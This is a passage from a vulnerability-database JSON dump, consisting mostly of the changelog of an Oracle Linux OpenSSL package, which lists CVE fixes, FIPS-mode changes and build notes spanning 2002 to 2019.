"2019-08-21T00:00:00", "published": "2019-08-21T00:00:00", "id": "WPVDB-ID:9538", "href": "https://wpvulndb.com/vulnerabilities/9538", "type": "wpvulndb", "title": "Google Calendar Events < 2.0.4 - XSS", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "oraclelinux": [{"lastseen": "2019-08-16T20:46:18", "bulletinFamily": "unix", "description": "[1.0.1e-58.0.1]\n- Oracle bug 28730228: backport CVE-2018-0732\n- Oracle bug 28758493: backport CVE-2018-0737\n- Merge upstream patch to fix CVE-2018-0739\n- Avoid out-of-bounds read. Fixes CVE 2017-3735. By Rich Salz\n- sha256 is used for the RSA pairwise consistency test instead of sha1\n[1.0.1e-58]\n- fix CVE-2019-1559 - 0-byte record padding oracle\n[1.0.1e-57]\n- fix CVE-2017-3731 - DoS via truncated packets with RC4-MD5 cipher\n[1.0.1e-55]\n- fix CVE-2016-8610 - DoS of single-threaded servers via excessive alerts\n[1.0.1e-54]\n- fix handling of ciphersuites present after the FALLBACK_SCSV\n ciphersuite entry (#1386350)\n[1.0.1e-53]\n- add README.legacy-settings\n[1.0.1e-52]\n- deprecate and disable verification of insecure hash algorithms\n- disallow DH keys with less than 1024 bits in TLS client\n- remove support for weak and export ciphersuites\n- use correct digest when exporting keying material in TLS1.2 (#1376741)\n[1.0.1e-50]\n- fix CVE-2016-2177 - possible integer overflow\n- fix CVE-2016-2178 - non-constant time DSA operations\n- fix CVE-2016-2179 - further DoS issues in DTLS\n- fix CVE-2016-2180 - OOB read in TS_OBJ_print_bio()\n- fix CVE-2016-2181 - DTLS1 replay protection and unprocessed records issue\n- fix CVE-2016-2182 - possible buffer overflow in BN_bn2dec()\n- fix CVE-2016-6302 - insufficient TLS session ticket HMAC length check\n- fix CVE-2016-6304 - unbound memory growth with OCSP status request\n- fix CVE-2016-6306 - certificate message OOB reads\n- mitigate CVE-2016-2183 - degrade all 64bit block ciphers and RC4 to\n 112 bit effective strength\n- replace expired testing certificates\n[1.0.1e-49]\n- fix CVE-2016-2105 - possible overflow in base64 encoding\n- fix CVE-2016-2106 - possible overflow in EVP_EncryptUpdate()\n- fix CVE-2016-2107 - padding oracle in stitched AES-NI CBC-MAC\n- fix CVE-2016-2108 - memory corruption in ASN.1 encoder\n- fix CVE-2016-2109 - possible DoS when reading ASN.1 data from BIO\n- fix CVE-2016-0799 - memory issues in BIO_printf\n[1.0.1e-48]\n- fix CVE-2016-0702 - side channel attack on modular exponentiation\n- fix CVE-2016-0705 - double-free in DSA private key parsing\n- fix CVE-2016-0797 - heap corruption in BN_hex2bn and BN_dec2bn\n[1.0.1e-47]\n- fix CVE-2015-3197 - SSLv2 ciphersuite enforcement\n- disable SSLv2 in the generic TLS method\n[1.0.1e-46]\n- fix 1-byte memory leak in pkcs12 parse (#1229871)\n- document some options of the speed command (#1197095)\n[1.0.1e-45]\n- fix high-precision timestamps in timestamping authority\n[1.0.1e-44]\n- fix CVE-2015-7575 - disallow use of MD5 in TLS1.2\n[1.0.1e-43]\n- fix CVE-2015-3194 - certificate verify crash with missing PSS parameter\n- fix CVE-2015-3195 - X509_ATTRIBUTE memory leak\n- fix CVE-2015-3196 - race condition when handling PSK identity hint\n[1.0.1e-42]\n- fix regression caused by mistake in fix for CVE-2015-1791\n[1.0.1e-41]\n- improved fix for CVE-2015-1791\n- add missing parts of CVE-2015-0209 fix for corectness although unexploitable\n[1.0.1e-40]\n- fix CVE-2014-8176 - invalid free in DTLS buffering code\n- fix CVE-2015-1789 - out-of-bounds read in X509_cmp_time\n- fix CVE-2015-1790 - PKCS7 crash with missing EncryptedContent\n- fix CVE-2015-1791 - race condition handling NewSessionTicket\n- fix CVE-2015-1792 - CMS verify infinite loop with unknown hash function\n[1.0.1e-39]\n- fix CVE-2015-3216 - regression in RAND locking that can cause segfaults on\n read in multithreaded applications\n[1.0.1e-38]\n- fix CVE-2015-4000 - prevent the logjam attack on client - restrict\n the DH key size to at least 768 bits (limit will be increased in future)\n[1.0.1e-37]\n- drop the AES-GCM restriction of 2^32 operations because the IV is\n always 96 bits (32 bit fixed field + 64 bit invocation field)\n[1.0.1e-36]\n- update fix for CVE-2015-0287 to what was released upstream\n[1.0.1e-35]\n- fix CVE-2015-0209 - potential use after free in d2i_ECPrivateKey()\n- fix CVE-2015-0286 - improper handling of ASN.1 boolean comparison\n- fix CVE-2015-0287 - ASN.1 structure reuse decoding memory corruption\n- fix CVE-2015-0288 - X509_to_X509_REQ NULL pointer dereference\n- fix CVE-2015-0289 - NULL dereference decoding invalid PKCS#7 data\n- fix CVE-2015-0292 - integer underflow in base64 decoder\n- fix CVE-2015-0293 - triggerable assert in SSLv2 server\n[1.0.1e-34]\n- copy digest algorithm when handling SNI context switch\n- improve documentation of ciphersuites - patch by Hubert Kario\n- add support for setting Kerberos service and keytab in\n s_server and s_client\n[1.0.1e-33]\n- fix CVE-2014-3570 - incorrect computation in BN_sqr()\n- fix CVE-2014-3571 - possible crash in dtls1_get_record()\n- fix CVE-2014-3572 - possible downgrade of ECDH ciphersuite to non-PFS state\n- fix CVE-2014-8275 - various certificate fingerprint issues\n- fix CVE-2015-0204 - remove support for RSA ephemeral keys for non-export\n ciphersuites and on server\n- fix CVE-2015-0205 - do not allow unauthenticated client DH certificate\n- fix CVE-2015-0206 - possible memory leak when buffering DTLS records\n[1.0.1e-32]\n- use FIPS approved method for computation of d in RSA\n[1.0.1e-31]\n- fix CVE-2014-3567 - memory leak when handling session tickets\n- fix CVE-2014-3513 - memory leak in srtp support\n- add support for fallback SCSV to partially mitigate CVE-2014-3566\n (padding attack on SSL3)\n[1.0.1e-30]\n- add ECC TLS extensions to DTLS (#1119800)\n[1.0.1e-29]\n- fix CVE-2014-3505 - doublefree in DTLS packet processing\n- fix CVE-2014-3506 - avoid memory exhaustion in DTLS\n- fix CVE-2014-3507 - avoid memory leak in DTLS\n- fix CVE-2014-3508 - fix OID handling to avoid information leak\n- fix CVE-2014-3509 - fix race condition when parsing server hello\n- fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling in DTLS\n- fix CVE-2014-3511 - disallow protocol downgrade via fragmentation\n[1.0.1e-28]\n- fix CVE-2014-0224 fix that broke EAP-FAST session resumption support\n[1.0.1e-26]\n- drop EXPORT, RC2, and DES from the default cipher list (#1057520)\n- print ephemeral key size negotiated in TLS handshake (#1057715)\n- do not include ECC ciphersuites in SSLv2 client hello (#1090952)\n- properly detect encryption failure in BIO (#1100819)\n- fail on hmac integrity check if the .hmac file is empty (#1105567)\n- FIPS mode: make the limitations on DSA, DH, and RSA keygen\n length enforced only if OPENSSL_ENFORCE_MODULUS_BITS environment\n variable is set\n[1.0.1e-25]\n- fix CVE-2010-5298 - possible use of memory after free\n- fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment\n- fix CVE-2014-0198 - possible NULL pointer dereference\n- fix CVE-2014-0221 - DoS from invalid DTLS handshake packet\n- fix CVE-2014-0224 - SSL/TLS MITM vulnerability\n- fix CVE-2014-3470 - client-side DoS when using anonymous ECDH\n[1.0.1e-24]\n- add back support for secp521r1 EC curve\n[1.0.1e-23]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension\n[1.0.1e-22]\n- use 2048 bit RSA key in FIPS selftests\n[1.0.1e-21]\n- add DH_compute_key_padded needed for FIPS CAVS testing\n- make 3des strength to be 128 bits instead of 168 (#1056616)\n- FIPS mode: do not generate DSA keys and DH parameters < 2048 bits\n- FIPS mode: use approved RSA keygen (allows only 2048 and 3072 bit keys)\n- FIPS mode: add DH selftest\n- FIPS mode: reseed DRBG properly on RAND_add()\n- FIPS mode: add RSA encrypt/decrypt selftest\n- FIPS mode: add hard limit for 2^32 GCM block encryptions with the same key\n- use the key length from configuration file if req -newkey rsa is invoked\n[1.0.1e-20]\n- fix CVE-2013-4353 - Invalid TLS handshake crash\n[1.0.1e-19]\n- fix CVE-2013-6450 - possible MiTM attack on DTLS1\n[1.0.1e-18]\n- fix CVE-2013-6449 - crash when version in SSL structure is incorrect\n[1.0.1e-17]\n- add back some no-op symbols that were inadvertently dropped\n[1.0.1e-16]\n- do not advertise ECC curves we do not support\n- fix CPU identification on Cyrix CPUs\n[1.0.1e-15]\n- make DTLS1 work in FIPS mode\n- avoid RSA and DSA 512 bits and Whirlpool in 'openssl speed' in FIPS mode\n[1.0.1e-14]\n- installation of dracut-fips marks that the FIPS module is installed\n[1.0.1e-13]\n- avoid dlopening libssl.so from libcrypto\n[1.0.1e-12]\n- fix small memory leak in FIPS aes selftest\n- fix segfault in openssl speed hmac in the FIPS mode\n[1.0.1e-11]\n- document the nextprotoneg option in manual pages\n original patch by Hubert Kario\n[1.0.1e-9]\n- always perform the FIPS selftests in library constructor\n if FIPS module is installed\n[1.0.1e-8]\n- fix use of rdrand if available\n- more commits cherry picked from upstream\n- documentation fixes\n[1.0.1e-7]\n- additional manual page fix\n- use symbol versioning also for the textual version\n[1.0.1e-6]\n- additional manual page fixes\n- cleanup speed command output for ECDH ECDSA\n[1.0.1e-5]\n- use _prefix macro\n[1.0.1e-4]\n- add relro linking flag\n[1.0.1e-2]\n- add support for the -trusted_first option for certificate chain verification\n[1.0.1e-1]\n- rebase to the 1.0.1e upstream version\n[1.0.0-28]\n- fix for CVE-2013-0169 - SSL/TLS CBC timing attack (#907589)\n- fix for CVE-2013-0166 - DoS in OCSP signatures checking (#908052)\n- enable compression only if explicitly asked for or OPENSSL_DEFAULT_ZLIB\n environment variable is set (fixes CVE-2012-4929 #857051)\n- use __secure_getenv() everywhere instead of getenv() (#839735)\n[1.0.0-27]\n- fix sslrand(1) and sslpasswd(1) reference in openssl(1) manpage (#841645)\n- drop superfluous lib64 fixup in pkgconfig .pc files (#770872)\n- force BIO_accept_new(*:\n) to listen on IPv4\n[1.0.0-26]\n- use PKCS#8 when writing private keys in FIPS mode as the old\n PEM encryption mode is not FIPS compatible (#812348)\n[1.0.0-25]\n- fix for CVE-2012-2333 - improper checking for record length in DTLS (#820686)\n- properly initialize tkeylen in the CVE-2012-0884 fix\n[1.0.0-24]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() (#814185)\n[1.0.0-23]\n- fix problem with the SGC restart patch that might terminate handshake\n incorrectly\n- fix for CVE-2012-0884 - MMA weakness in CMS and PKCS#7 code (#802725)\n- fix for CVE-2012-1165 - NULL read dereference on bad MIME headers (#802489)\n[1.0.0-22]\n- fix incorrect encryption of unaligned chunks in CFB, OFB and CTR modes\n[1.0.0-21]\n- fix for CVE-2011-4108 & CVE-2012-0050 - DTLS plaintext recovery\n vulnerability and additional DTLS fixes (#771770)\n- fix for CVE-2011-4576 - uninitialized SSL 3.0 padding (#771775)\n- fix for CVE-2011-4577 - possible DoS through malformed RFC 3779 data (#771778)\n- fix for CVE-2011-4619 - SGC restart DoS attack (#771780)\n[1.0.0-20]\n- fix x86cpuid.pl - patch by Paolo Bonzini\n[1.0.0-19]\n- add known answer test for SHA2 algorithms\n[1.0.0-18]\n- fix missing initialization of a variable in the CHIL engine (#740188)\n[1.0.0-17]\n- initialize the X509_STORE_CTX properly for CRL lookups - CVE-2011-3207\n (#736087)\n[1.0.0-16]\n- merge the optimizations for AES-NI, SHA1, and RC4 from the intelx\n engine to the internal implementations\n[1.0.0-15]\n- better documentation of the available digests in apps (#693858)\n- backported CHIL engine fixes (#693863)\n- allow testing build without downstream patches (#708511)\n- enable partial RELRO when linking (#723994)\n- add intelx engine with improved performance on new Intel CPUs\n- add OPENSSL_DISABLE_AES_NI environment variable which disables\n the AES-NI support (does not affect the intelx engine)\n[1.0.0-14]\n- use the AES-NI engine in the FIPS mode\n[1.0.0-11]\n- add API necessary for CAVS testing of the new DSA parameter generation\n[1.0.0-10]\n- fix OCSP stapling vulnerability - CVE-2011-0014 (#676063)\n- correct the README.FIPS document\n[1.0.0-8]\n- add -x931 parameter to openssl genrsa command to use the ANSI X9.31\n key generation method\n- use FIPS-186-3 method for DSA parameter generation\n- add OPENSSL_FIPS_NON_APPROVED_MD5_ALLOW environment variable\n to allow using MD5 when the system is in the maintenance state\n even if the /proc fips flag is on\n- make openssl pkcs12 command work by default in the FIPS mode\n[1.0.0-7]\n- listen on ipv6 wildcard in s_server so we accept connections\n from both ipv4 and ipv6 (#601612)\n- fix openssl speed command so it can be used in the FIPS mode\n with FIPS allowed ciphers (#619762)\n[1.0.0-6]\n- disable code for SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG - CVE-2010-3864\n (#649304)\n[1.0.0-5]\n- fix race in extension parsing code - CVE-2010-3864 (#649304)\n[1.0.0-4]\n- openssl man page fix (#609484)\n[1.0.0-3]\n- fix wrong ASN.1 definition of OriginatorInfo - CVE-2010-0742 (#598738)\n- fix information leak in rsa_verify_recover - CVE-2010-1633 (#598732)\n[1.0.0-2]\n- make CA dir readable - the private keys are in private subdir (#584810)\n- a few fixes from upstream CVS\n- make X509_NAME_hash_old work in FIPS mode (#568395)\n[1.0.0-1]\n- update to final 1.0.0 upstream release\n[1.0.0-0.22.beta5]\n- make TLS work in the FIPS mode\n[1.0.0-0.21.beta5]\n- gracefully handle zero length in assembler implementations of\n OPENSSL_cleanse (#564029)\n- do not fail in s_server if client hostname not resolvable (#561260)\n[1.0.0-0.20.beta5]\n- new upstream release\n[1.0.0-0.19.beta4]\n- fix CVE-2009-4355 - leak in applications incorrectly calling\n CRYPTO_free_all_ex_data() before application exit (#546707)\n- upstream fix for future TLS protocol version handling\n[1.0.0-0.18.beta4]\n- add support for Intel AES-NI\n[1.0.0-0.17.beta4]\n- upstream fix compression handling on session resumption\n- various null checks and other small fixes from upstream\n- upstream changes for the renegotiation info according to the latest draft\n[1.0.0-0.16.beta4]\n- fix non-fips mingw build (patch by Kalev Lember)\n- add IPV6 fix for DTLS\n[1.0.0-0.15.beta4]\n- add better error reporting for the unsafe renegotiation\n[1.0.0-0.14.beta4]\n- fix build on s390x\n[1.0.0-0.13.beta4]\n- disable enforcement of the renegotiation extension on the client (#537962)\n- add fixes from the current upstream snapshot\n[1.0.0-0.12.beta4]\n- keep the beta status in version number at 3 so we do not have to rebuild\n openssh and possibly other dependencies with too strict version check\n[1.0.0-0.11.beta4]\n- update to new upstream version, no soname bump needed\n- fix CVE-2009-3555 - note that the fix is bypassed if SSL_OP_ALL is used\n so the compatibility with unfixed clients is not broken. The\n protocol extension is also not final.\n[1.0.0-0.10.beta3]\n- fix use of freed memory if SSL_CTX_free() is called before\n SSL_free() (#521342)\n[1.0.0-0.9.beta3]\n- fix typo in DTLS1 code (#527015)\n- fix leak in error handling of d2i_SSL_SESSION()\n[1.0.0-0.8.beta3]\n- fix RSA and DSA FIPS selftests\n- reenable fixed x86_64 camellia assembler code (#521127)\n[1.0.0-0.7.beta3]\n- temporarily disable x86_64 camellia assembler code (#521127)\n[1.0.0-0.6.beta3]\n- fix openssl dgst -dss1 (#520152)\n[1.0.0-0.5.beta3]\n- drop the compat symlink hacks\n[1.0.0-0.4.beta3]\n- constify SSL_CIPHER_description()\n[1.0.0-0.3.beta3]\n- fix WWW:Curl:Easy reference in tsget\n[1.0.0-0.2.beta3]\n- enable MD-2\n[1.0.0-0.1.beta3]\n- update to new major upstream release\n[0.9.8k-7]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n* Wed Jul 22 2009 Bill Nottingham \n- do not build special 'optimized' versions for i686, as that's the base\n arch in Fedora now\n[0.9.8k-6]\n- abort if selftests failed and random number generator is polled\n- mention EVP_aes and EVP_sha2xx routines in the manpages\n- add README.FIPS\n- make CA dir absolute path (#445344)\n- change default length for RSA key generation to 2048 (#484101)\n[0.9.8k-5]\n- fix CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n (DTLS DoS problems) (#501253, #501254, #501572)\n[0.9.8k-4]\n- support compatibility DTLS mode for CISCO AnyConnect (#464629)\n[0.9.8k-3]\n- correct the SHLIB_VERSION define\n[0.9.8k-2]\n- add support for multiple CRLs with same subject\n- load only dynamic engine support in FIPS mode\n[0.9.8k-1]\n- update to new upstream release (minor bug fixes, security\n fixes and machine code optimizations only)\n[0.9.8j-10]\n- move libraries to /usr/lib (#239375)\n[0.9.8j-9]\n- add a static subpackage\n[0.9.8j-8]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n[0.9.8j-7]\n- must also verify checksum of libssl.so in the FIPS mode\n- obtain the seed for FIPS rng directly from the kernel device\n- drop the temporary symlinks\n[0.9.8j-6]\n- drop the temporary triggerpostun and symlinking in post\n- fix the pkgconfig files and drop the unnecessary buildrequires\n on pkgconfig as it is a rpmbuild dependency (#481419)\n[0.9.8j-5]\n- add temporary triggerpostun to reinstate the symlinks\n[0.9.8j-4]\n- no pairwise key tests in non-fips mode (#479817)\n[0.9.8j-3]\n- even more robust test for the temporary symlinks\n[0.9.8j-2]\n- try to ensure the temporary symlinks exist\n[0.9.8j-1]\n- new upstream version with necessary soname bump (#455753)\n- temporarily provide symlink to old soname to make it possible to rebuild\n the dependent packages in rawhide\n- add eap-fast support (#428181)\n- add possibility to disable zlib by setting\n- add fips mode support for testing purposes\n- do not null dereference on some invalid smime files\n- add buildrequires pkgconfig (#479493)\n[0.9.8g-11]\n- do not add tls extensions to server hello for SSLv3 either\n[0.9.8g-10]\n- move root CA bundle to ca-certificates package\n[0.9.8g-9]\n- fix CVE-2008-0891 - server name extension crash (#448492)\n- fix CVE-2008-1672 - server key exchange message omit crash (#448495)\n[0.9.8g-8]\n- super-H arch support\n- drop workaround for bug 199604 as it should be fixed in gcc-4.3\n[0.9.8g-7]\n- sparc handling\n[0.9.8g-6]\n- update to new root CA bundle from mozilla.org (r1.45)\n[0.9.8g-5]\n- Autorebuild for GCC 4.3\n[0.9.8g-4]\n- merge review fixes (#226220)\n- adjust the SHLIB_VERSION_NUMBER to reflect library name (#429846)\n[0.9.8g-3]\n- set default paths when no explicit paths are set (#418771)\n- do not add tls extensions to client hello for SSLv3 (#422081)\n[0.9.8g-2]\n- enable some new crypto algorithms and features\n- add some more important bug fixes from openssl CVS\n[0.9.8g-1]\n- update to latest upstream release, SONAME bumped to 7\n[0.9.8b-17]\n- update to new CA bundle from mozilla.org\n[0.9.8b-16]\n- fix CVE-2007-5135 - off-by-one in SSL_get_shared_ciphers (#309801)\n- fix CVE-2007-4995 - out of order DTLS fragments buffer overflow (#321191)\n- add alpha sub-archs (#296031)\n[0.9.8b-15]\n- rebuild\n[0.9.8b-14]\n- use localhost in testsuite, hopefully fixes slow build in koji\n- CVE-2007-3108 - fix side channel attack on private keys (#250577)\n- make ssl session cache id matching strict (#233599)\n[0.9.8b-13]\n- allow building on ARM architectures (#245417)\n- use reference timestamps to prevent multilib conflicts (#218064)\n- -devel package must require pkgconfig (#241031)\n[0.9.8b-12]\n- detect duplicates in add_dir properly (#206346)\n[0.9.8b-11]\n- the previous change still didn't make X509_NAME_cmp transitive\n[0.9.8b-10]\n- make X509_NAME_cmp transitive otherwise certificate lookup\n is broken (#216050)\n[0.9.8b-9]\n- aliasing bug in engine loading, patch by IBM (#213216)\n[0.9.8b-8]\n- CVE-2006-2940 fix was incorrect (#208744)\n[0.9.8b-7]\n- fix CVE-2006-2937 - mishandled error on ASN.1 parsing (#207276)\n- fix CVE-2006-2940 - parasitic public keys DoS (#207274)\n- fix CVE-2006-3738 - buffer overflow in SSL_get_shared_ciphers (#206940)\n- fix CVE-2006-4343 - sslv2 client DoS (#206940)\n[0.9.8b-6]\n- fix CVE-2006-4339 - prevent attack on PKCS#1 v1.5 signatures (#205180)\n[0.9.8b-5]\n- set buffering to none on stdio/stdout FILE when bufsize is set (#200580)\n patch by IBM\n[0.9.8b-4.1]\n- rebuild with new binutils (#200330)\n[0.9.8b-4]\n- add a temporary workaround for sha512 test failure on s390 (#199604)\n* Thu Jul 20 2006 Tomas Mraz \n- add ipv6 support to s_client and s_server (by Jan Pazdziora) (#198737)\n- add patches for BN threadsafety, AES cache collision attack hazard fix and\n pkcs7 code memleak fix from upstream CVS\n[0.9.8b-3.1]\n- rebuild\n[0.9.8b-3]\n- dropped libica and ica engine from build\n* Wed Jun 21 2006 Joe Orton \n- update to new CA bundle from mozilla.org; adds CA certificates\n from netlock.hu and startcom.org\n[0.9.8b-2]\n- fixed a few rpmlint warnings\n- better fix for #173399 from upstream\n- upstream fix for pkcs12\n[0.9.8b-1]\n- upgrade to new version, stays ABI compatible\n- there is no more linux/config.h (it was empty anyway)\n[0.9.8a-6]\n- fix stale open handles in libica (#177155)\n- fix build if 'rand' or 'passwd' in buildroot path (#178782)\n- initialize VIA Padlock engine (#186857)\n[0.9.8a-5.2]\n- bump again for double-long bug on ppc(64)\n[0.9.8a-5.1]\n- rebuilt for new gcc4.1 snapshot and glibc changes\n[0.9.8a-5]\n- don't include SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG\n in SSL_OP_ALL (#175779)\n* Fri Dec 09 2005 Jesse Keating \n- rebuilt\n[0.9.8a-4]\n- fix build (-lcrypto was erroneusly dropped) of the updated libica\n- updated ICA engine to 1.3.6-rc3\n[0.9.8a-3]\n- disable builtin compression methods for now until they work\n properly (#173399)\n[0.9.8a-2]\n- don't set -rpath for openssl binary\n[0.9.8a-1]\n- new upstream version\n- patches partially renumbered\n[0.9.7f-11]\n- updated IBM ICA engine library and patch to latest upstream version\n[0.9.7f-10]\n- fix CAN-2005-2969 - remove SSL_OP_MSIE_SSLV2_RSA_PADDING which\n disables the countermeasure against man in the middle attack in SSLv2\n (#169863)\n- use sha1 as default for CA and cert requests - CAN-2005-2946 (#169803)\n[0.9.7f-9]\n- add *.so.soversion as symlinks in /lib (#165264)\n- remove unpackaged symlinks (#159595)\n- fixes from upstream (constant time fixes for DSA,\n bn assembler div on ppc arch, initialize memory on realloc)\n[0.9.7f-8]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7f-7]\n- fix CAN-2005-0109 - use constant time/memory access mod_exp\n so bits of private key aren't leaked by cache eviction (#157631)\n- a few more fixes from upstream 0.9.7g\n[0.9.7f-6]\n- use poll instead of select in rand (#128285)\n- fix Makefile.certificate to point to /etc/pki/tls\n- change the default string mask in ASN1 to PrintableString+UTF8String\n[0.9.7f-5]\n- update to revision 1.37 of Mozilla CA bundle\n[0.9.7f-4]\n- move certificates to _sysconfdir/pki/tls (#143392)\n- move CA directories to _sysconfdir/pki/CA\n- patch the CA script and the default config so it points to the\n CA directories\n[0.9.7f-3]\n- uninitialized variable mustn't be used as input in inline\n assembly\n- reenable the x86_64 assembly again\n[0.9.7f-2]\n- add back RC4_CHAR on ia64 and x86_64 so the ABI isn't broken\n- disable broken bignum assembly on x86_64\n[0.9.7f-1]\n- reenable optimizations on ppc64 and assembly code on ia64\n- upgrade to new upstream version (no soname bump needed)\n- disable thread test - it was testing the backport of the\n RSA blinding - no longer needed\n- added support for changing serial number to\n Makefile.certificate (#151188)\n- make ca-bundle.crt a config file (#118903)\n[0.9.7e-3]\n- libcrypto shouldn't depend on libkrb5 (#135961)\n[0.9.7e-2]\n- rebuild\n[0.9.7e-1]\n- new upstream source, updated patches\n- added patch so we are hopefully ABI compatible with upcoming\n 0.9.7f\n* Thu Feb 10 2005 Tomas Mraz \n- Support UTF-8 charset in the Makefile.certificate (#134944)\n- Added cmp to BuildPrereq\n[0.9.7a-46]\n- generate new ca-bundle.crt from Mozilla certdata.txt (revision 1.32)\n[0.9.7a-45]\n- Fixed and updated libica-1.3.4-urandom.patch patch (#122967)\n[0.9.7a-44]\n- rebuild\n[0.9.7a-43]\n- rebuild\n[0.9.7a-42]\n- rebuild\n[0.9.7a-41]\n- remove der_chop, as upstream cvs has done (CAN-2004-0975, #140040)\n[0.9.7a-40]\n- Include latest libica version with important bugfixes\n* Tue Jun 15 2004 Elliot Lee \n- rebuilt\n[0.9.7a-38]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7a-37]\n- build for linux-alpha-gcc instead of alpha-gcc on alpha (Jeff Garzik)\n[0.9.7a-36]\n- handle %{_arch}=i486/i586/i686/athlon cases in the intermediate\n header (#124303)\n[0.9.7a-35]\n- add security fixes for CAN-2004-0079, CAN-2004-0112\n* Tue Mar 16 2004 Phil Knirsch \n- Fixed libica filespec.\n[0.9.7a-34]\n- ppc/ppc64 define __powerpc__/__powerpc64__, not __ppc__/__ppc64__, fix\n the intermediate header\n[0.9.7a-33]\n- add an intermediate \n which points to the right\n arch-specific opensslconf.h on multilib arches\n* Tue Mar 02 2004 Elliot Lee \n- rebuilt\n[0.9.7a-32]\n- Updated libica to latest upstream version 1.3.5.\n[0.9.7a-31]\n- Update ICA crypto engine patch from IBM to latest version.\n* Fri Feb 13 2004 Elliot Lee \n- rebuilt\n[0.9.7a-29]\n- rebuilt\n[0.9.7a-28]\n- Fixed libica build.\n* Wed Feb 04 2004 Nalin Dahyabhai \n- add '-ldl' to link flags added for Linux-on-ARM (#99313)\n[0.9.7a-27]\n- updated ca-bundle.crt: removed expired GeoTrust roots, added\n freessl.com root, removed trustcenter.de Class 0 root\n[0.9.7a-26]\n- Fix link line for libssl (bug #111154).\n[0.9.7a-25]\n- add dependency on zlib-devel for the -devel package, which depends on zlib\n symbols because we enable zlib for libssl (#102962)\n[0.9.7a-24]\n- Use /dev/urandom instead of PRNG for libica.\n- Apply libica-1.3.5 fix for /dev/urandom in icalinux.c\n- Use latest ICA engine patch from IBM.\n[0.9.7a-22.1]\n- rebuild\n[0.9.7a-22]\n- rebuild (22 wasn't actually built, fun eh?)\n[0.9.7a-23]\n- re-disable optimizations on ppc64\n* Tue Sep 30 2003 Joe Orton \n- add a_mbstr.c fix for 64-bit platforms from CVS\n[0.9.7a-22]\n- add -Wa,--noexecstack to RPM_OPT_FLAGS so that assembled modules get tagged\n as not needing executable stacks\n[0.9.7a-21]\n- rebuild\n* Thu Sep 25 2003 Nalin Dahyabhai \n- re-enable optimizations on ppc64\n* Thu Sep 25 2003 Nalin Dahyabhai \n- remove exclusivearch\n[0.9.7a-20]\n- only parse a client cert if one was requested\n- temporarily exclusivearch for %{ix86}\n* Tue Sep 23 2003 Nalin Dahyabhai \n- add security fixes for protocol parsing bugs (CAN-2003-0543, CAN-2003-0544)\n and heap corruption (CAN-2003-0545)\n- update RHNS-CA-CERT files\n- ease back on the number of threads used in the threading test\n[0.9.7a-19]\n- rebuild to fix gzipped file md5sums (#91211)\n[0.9.7a-18]\n- Updated libica to version 1.3.4.\n[0.9.7a-17]\n- rebuild\n[0.9.7a-10.9]\n- free the kssl_ctx structure when we free an SSL structure (#99066)\n[0.9.7a-16]\n- rebuild\n[0.9.7a-15]\n- lower thread test count on s390x\n[0.9.7a-14]\n- rebuild\n[0.9.7a-13]\n- disable assembly on arches where it seems to conflict with threading\n[0.9.7a-12]\n- Updated libica to latest upstream version 1.3.0\n[0.9.7a-9.9]\n- rebuild\n[0.9.7a-11]\n- rebuild\n[0.9.7a-10]\n- ubsec: don't stomp on output data which might also be input data\n[0.9.7a-9]\n- temporarily disable optimizations on ppc64\n* Mon Jun 09 2003 Nalin Dahyabhai \n- backport fix for engine-used-for-everything from 0.9.7b\n- backport fix for prng not being seeded causing problems, also from 0.9.7b\n- add a check at build-time to ensure that RSA is thread-safe\n- keep perlpath from stomping on the libica configure scripts\n* Fri Jun 06 2003 Nalin Dahyabhai \n- thread-safety fix for RSA blinding\n[0.9.7a-8]\n- rebuilt\n[0.9.7a-7]\n- Added libica-1.2 to openssl (featurerequest).\n[0.9.7a-6]\n- fix building with incorrect flags on ppc64\n[0.9.7a-5]\n- add patch to harden against Klima-Pokorny-Rosa extension of Bleichenbacher's\n attack (CAN-2003-0131)\n[ 0.9.7a-4]\n- add patch to enable RSA blinding by default, closing a timing attack\n (CAN-2003-0147)\n[0.9.7a-3]\n- disable use of BN assembly module on x86_64, but continue to allow inline\n assembly (#83403)\n[0.9.7a-2]\n- disable EC algorithms\n[0.9.7a-1]\n- update to 0.9.7a\n[0.9.7-8]\n- add fix to guard against attempts to allocate negative amounts of memory\n- add patch for CAN-2003-0078, fixing a timing attack\n[0.9.7-7]\n- Add openssl-ppc64.patch\n[0.9.7-6]\n- EVP_DecryptInit should call EVP_CipherInit() instead of EVP_CipherInit_ex(),\n to get the right behavior when passed uninitialized context structures\n (#83766)\n- build with -mcpu=ev5 on alpha family (#83828)\n* Wed Jan 22 2003 Tim Powers \n- rebuilt\n[0.9.7-4]\n- Added IBM hw crypto support patch.\n* Wed Jan 15 2003 Nalin Dahyabhai \n- add missing builddep on sed\n[0.9.7-3]\n- debloat\n- fix broken manpage symlinks\n[0.9.7-2]\n- fix double-free in 'openssl ca'\n[0.9.7-1]\n- update to 0.9.7 final\n[0.9.7-0]\n- update to 0.9.7 beta6 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n* Wed Dec 11 2002 Nalin Dahyabhai \n- update to 0.9.7 beta5 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n[0.9.6b-30]\n- add configuration stanza for x86_64 and use it on x86_64\n- build for linux-ppc on ppc\n- start running the self-tests again\n[0.9.6b-29hammer.3]\n- Merge fixes from previous hammer packages, including general x86-64 and\n multilib\n[0.9.6b-29]\n- rebuild\n[0.9.6b-28]\n- update asn patch to fix accidental reversal of a logic check\n[0.9.6b-27]\n- update asn patch to reduce chance that compiler optimization will remove\n one of the added tests\n[0.9.6b-26]\n- rebuild\n[0.9.6b-25]\n- add patch to fix ASN.1 vulnerabilities\n[0.9.6b-24]\n- add backport of Ben Laurie's patches for OpenSSL 0.9.6d\n[0.9.6b-23]\n- own {_datadir}/ssl/misc\n* Fri Jun 21 2002 Tim Powers \n- automated rebuild\n* Sun May 26 2002 Tim Powers \n- automated 